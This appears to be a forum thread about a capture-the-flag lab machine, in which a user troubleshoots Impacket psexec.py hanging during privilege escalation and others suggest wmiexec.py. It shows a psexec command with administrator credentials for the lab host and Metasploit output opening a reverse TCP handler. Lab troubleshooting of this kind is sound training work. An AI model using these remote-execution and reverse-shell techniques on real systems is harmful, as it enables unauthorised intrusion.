Starting Point (psexec.py)

When attempting privilege escalation I'm having issues with psexec.py hanging on the uploading file step. I've tried psexec and Metasploit as well as two different images of Kali and get the same on both. I've done quite a bit of searching and can't figure it out so any ideas are appreciated.

psexec:

[email protected]:~# psexec.py 'administrator:MEGACORP_4dm1n!!@10.10.10.27'

[] Requesting shares on 10.10.10.27.....
[
] Found writable share ADMIN$
[*] Uploading file KmgOXzkz.exe

Metasploit:

[] Started reverse TCP handler on 10.10.14.49:4444
[
] 10.10.10.27:445 - Connecting to the server...
[] 10.10.10.27:445 - Authenticating to 10.10.10.27:445 as user 'administrator'...
[
] 10.10.10.27:445 - Selecting PowerShell target
[] 10.10.10.27:445 - Executing the payload...
[+] 10.10.10.27:445 - Service start timed out, OK if running a command or non-service executable...
[
] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >

Comments

  • edited April 2020

    Double check your password. You have a typo.

    EDIT: Just kidding, your password is correct.

    TheBrick

  • Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

  • Type your comment> @johniesmithe said:

    Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

    yeah I've always had more success with wmiexec as well for some reason. Never looked into it but interesting to see you come to the same conclusion

  • Type your comment> @johniesmithe said:

    Just in case anybody else has a similar issue I was finally able to get root by using wmiexec.py instead of psexec.py.

    Thank god I stumbled across this, was about to start going balls deep into psexec.py
    Cheers

  • Tried wmiexec.py too... but no joy.

    Box broken?

  • edited April 24

    python3 psexec.py [email protected]
    Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

    Password:
    [-] [Errno Connection error (10.10.10.27:445)] timed out

    Why is this happening

  • Someone helped me out I stuck on python3 -m http.server 80
    => This is just showing following;

    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)...
    Pls help me

  • @deepnest said:

    Someone helped me out I stuck on python3 -m http.server 80
    => This is just showing following;

    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)...
    Pls help me

    Thats a server waiting for a connection. What do you want it to do?

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

Sign In to comment.